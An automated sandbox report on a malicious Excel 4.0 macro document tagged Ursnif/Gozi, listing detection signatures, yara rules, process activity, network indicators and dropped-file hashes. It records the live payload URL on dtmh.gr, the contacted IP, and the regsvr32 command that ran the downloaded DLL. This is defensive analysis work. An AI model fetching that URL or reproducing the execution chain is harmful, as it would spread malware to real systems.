Loading ...

Play interactive tourEdit tour

Analysis Report document-1411385003.xls

Overview

General Information

Sample Name:document-1411385003.xls
Analysis ID:324316
MD5:0e578c836b3cc5b29771e51f3c4b0cf9
SHA1:2fb23ab9b9439f7d447ec529415e1039143d33d1
SHA256:e4b39e254df2f996274732baea7d3ead38ca845d404aac72e682f378b78531be
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2232 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2324 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1411385003.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x502a2:$s1: Excel
  • 0x5131d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1411385003.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2232, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 2324

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1411385003.xlsReversingLabs: Detection: 48%

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
    Source: excel.exeMemory has grown: Private usage: 4MB later: 55MB
    Source: global trafficDNS query: name: dtmh.gr
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 78.46.235.88:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 78.46.235.88:443
    Source: Joe Sandbox ViewIP Address: 78.46.235.88 78.46.235.88
    Source: unknownDNS traffic detected: queries for: dtmh.gr
    Source: regsvr32.exe, 00000003.00000002.2139185175.0000000001D80000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: document-1411385003.xlsString found in binary or memory: https://dtmh.gr/ds/231120.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S T : 1 2 3 4 5 6 7
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1411385003.xlsInitial sample: CALL
    Source: document-1411385003.xlsInitial sample: CALL
    Source: document-1411385003.xlsInitial sample: CALL
    Source: document-1411385003.xlsInitial sample: CALL
    Source: document-1411385003.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1411385003.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1411385003.xlsOLE indicator, VBA macros: true
    Source: document-1411385003.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\E1EE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD900.tmpJump to behavior
    Source: document-1411385003.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: document-1411385003.xlsReversingLabs: Detection: 48%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1411385003.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Masquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1411385003.xls11%MetadefenderBrowse
    document-1411385003.xls48%ReversingLabsDocument-Word.Backdoor.Quakbot

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    dtmh.gr
    78.46.235.88
    truefalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://dtmh.gr/ds/231120.gifdocument-1411385003.xlsfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2139185175.0000000001D80000.00000002.00000001.sdmpfalse
      • Avira URL Cloud: safe
      low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      78.46.235.88
      unknownGermany
      24940HETZNER-ASDEfalse

      General Information

      Joe Sandbox Version:31.0.0 Red Diamond
      Analysis ID:324316
      Start date:29.11.2020
      Start time:06:02:08
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 47s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:document-1411385003.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal80.expl.evad.winXLS@3/5@1/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/324316/sample/document-1411385003.xls

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      78.46.235.88document-1422773217.xlsGet hashmaliciousBrowse
        document-1422773217.xlsGet hashmaliciousBrowse
          document-1410525703.xlsGet hashmaliciousBrowse
            document-1410525703.xlsGet hashmaliciousBrowse
              document-1411290183.xlsGet hashmaliciousBrowse
                document-1393356833.xlsGet hashmaliciousBrowse
                  document-1411290183.xlsGet hashmaliciousBrowse
                    document-1393356833.xlsGet hashmaliciousBrowse
                      document-1449702565.xlsGet hashmaliciousBrowse
                        document-1457177111.xlsGet hashmaliciousBrowse
                          document-1449702565.xlsGet hashmaliciousBrowse
                            document-146786230.xlsGet hashmaliciousBrowse
                              document-1457177111.xlsGet hashmaliciousBrowse
                                document-146786230.xlsGet hashmaliciousBrowse
                                  document-1442977347.xlsGet hashmaliciousBrowse
                                    document-1442977347.xlsGet hashmaliciousBrowse
                                      document-1465459998.xlsGet hashmaliciousBrowse
                                        document-1444203221.xlsGet hashmaliciousBrowse
                                          document-1444203221.xlsGet hashmaliciousBrowse
                                            document-1466544307.xlsGet hashmaliciousBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              dtmh.grdocument-1422773217.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1422773217.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1410525703.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1410525703.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1411290183.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1393356833.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1411290183.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1393356833.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1449702565.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1457177111.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1449702565.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-146786230.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1457177111.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-146786230.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1442977347.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1442977347.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1465459998.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1444203221.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1444203221.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1466544307.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              HETZNER-ASDEdocument-1422773217.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1422773217.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1410525703.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1410525703.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1411290183.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1393356833.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1411290183.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1393356833.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1449702565.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1457177111.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1449702565.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-146786230.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1457177111.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-146786230.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1442977347.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1442977347.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1465459998.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1444203221.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1444203221.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88
                                              document-1466544307.xlsGet hashmaliciousBrowse
                                              • 78.46.235.88

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\50EE0000
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):316270
                                              Entropy (8bit):7.9838517767090424
                                              Encrypted:false
                                              SSDEEP:6144:8SrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MB:HFPM8R3AsB+bjej/9cu
                                              MD5:BD6FEE98DC956A97F2085054D09D055E
                                              SHA1:3907740BED9C539D453E2AF2CA569BDBA75F145C
                                              SHA-256:96528633FE30A9C50F29386B3F8754C54FE33828575967CA2D76F78A2CDFA6DF
                                              SHA-512:75023FD18A36794D4F274B69741E645855BB344A5ACD7B626844FB3C6C7807E2E015CBA4F14663649FBEB7FE88F7C71206B688AC1B3D50338712ADA3DB3286E8
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..n.0.E.......D'.....E....I?.&..a.@.............C..s.R.x~..x...55..f........._.wR..`.......Y|.4..9..V.P.6F....[.,T......E....._....l..rk".X.A..b....-^.;YJC......&.9%9.h.>.1..v........Up...-@.r^".?@..X .(.f..:yN.WxPaP2b.....Jh.._0.7.i.....?..^.(.....V.g..Kk..i....%l9.*'Vi..3l...4/.O.re.......o....:..#>..F....#..N.....;....|......._c.yV..zT.:...r...h~=.~.2#..w...p/:Fn.....l.n......s.@.......p9S...s.......8..u.....^&J.........r...8......... ...&D....e..i...........PK..........!...|j............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 13:02:43 2020, atime=Sun Nov 29 13:02:43 2020, length=8192, window=hide
                                              Category:dropped
                                              Size (bytes):867
                                              Entropy (8bit):4.464614488906293
                                              Encrypted:false
                                              SSDEEP:12:85Qq24CLgXg/XAlCPCHaXgzB8IB/NKxRX+WnicvbVbDtZ3YilMMEpxRljKxTdJP8:85z24U/XTwz6Ii/YetDv3qkrNru/
                                              MD5:57EF378CB949CEA48A13D45D110F50ED
                                              SHA1:D8B9B60488F47736366B8A02F22683CDF4138AF0
                                              SHA-256:E6ADCF0A4739586513F671566F410306792DA622C2B7298BCA7CDC3F21D92F08
                                              SHA-512:5265BF1F36946D526DF24522BDBB4BBF49D13609A12F9D2FD0B78A67E24C873265DA70FA2EE96DC1E87504D52FC7D3897CA00AEC6C6BCC61B281451D6DAC6DD2
                                              Malicious:false
                                              Reputation:low
                                              Preview: L..................F...........7G...).NX....).NX.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}QVp..Desktop.d......QK.X}QVp*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\138727\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......138727..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1411385003.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sun Nov 29 13:02:43 2020, atime=Sun Nov 29 13:02:43 2020, length=339968, window=hide
                                              Category:dropped
                                              Size (bytes):4236
                                              Entropy (8bit):4.506298020663494
                                              Encrypted:false
                                              SSDEEP:96:8iL/XLIkf1hkQh2iL/XLIkf1hkQh2iL/XLIkf1hkQh2iL/XLIkf1hkQ/:8UIkgQEUIkgQEUIkgQEUIkgQ/
                                              MD5:0E49CE990AC503E4E9CCF8F2DD0957CB
                                              SHA1:69A9A829E1ECC43D8A7BB7F51709A5FABC020D41
                                              SHA-256:EA41B7D8D8E0D9AAAA7425A15CB5BD93215D18F0D848F986B77E04030ED01B3E
                                              SHA-512:70145F362C59DA2A54BCDB9C2BFB81DCE44470F37AED89C7C2A386E2BC8AD469D1025DD24698A8D76ED6E9D379CA8A1B7E605353ACCE6C7BB50A3C8A98C0839B
                                              Malicious:false
                                              Reputation:low
                                              Preview: L..................F.... ....."..{...).NX....M.NX....0...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..0..}QSp .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.4.1.1.3.8.5.0.0.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\138727\Users.user\Desktop\document-1411385003.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.1.1.3.8.5.0.0.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......138727..........D_....3N.
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):232
                                              Entropy (8bit):4.659010171944146
                                              Encrypted:false
                                              SSDEEP:6:dj6Y9LiiWpuYgELiiWpuYUY9LiiWpuYgELiiWpuYUY9LiiWpuYgELiiWpuYUY9Lr:dmfiWpuYsiWpuYUfiWpuYsiWpuYUfiWY
                                              MD5:2533CD7B5053F7312DE40EFA72755FCC
                                              SHA1:49CF1CD8E42325C9560D5C956B0761F53230A916
                                              SHA-256:B9B4D2DB01459583632D2ACCB47BDAC642FD3C52A64689DDEEB6378F5B4E8792
                                              SHA-512:152125580E4AFFF6EAB9AFA146575639BB9F3FD75CE8E0ED3D09A9D7A5090D946B3999108AB68F0C08C9E5CF35807F29AEA3306A19033B65CBB7692927C5D7B7
                                              Malicious:false
                                              Reputation:low
                                              Preview: Desktop.LNK=0..[xls]..document-1411385003.LNK=0..document-1411385003.LNK=0..[xls]..document-1411385003.LNK=0..document-1411385003.LNK=0..[xls]..document-1411385003.LNK=0..document-1411385003.LNK=0..[xls]..document-1411385003.LNK=0..
                                              C:\Users\user\Desktop\E1EE0000
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Category:dropped
                                              Size (bytes):401081
                                              Entropy (8bit):7.183065921774767
                                              Encrypted:false
                                              SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdC:Kizo8RnsIROnr6n75YJS
                                              MD5:A00E5BE15A73ADA4F6FFF9DA7C7987E1
                                              SHA1:ACF64805C40D3D2DB9D40F7AAA3B38E49B79623A
                                              SHA-256:B0EDC9153FD2C4E23DCD7E006D0D6B95B4AD1623FAA8D6BB3510359C56A7126E
                                              SHA-512:AED8E98DB7EDD115BFAC377890C5744925234857A26C4EE3BC2DC283196CAB0D3C4AFD888F463B2A401BF72D7D66115228BED56010965E4F266CE96324F40BF5
                                              Malicious:false
                                              Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

                                              Static File Info

                                              General

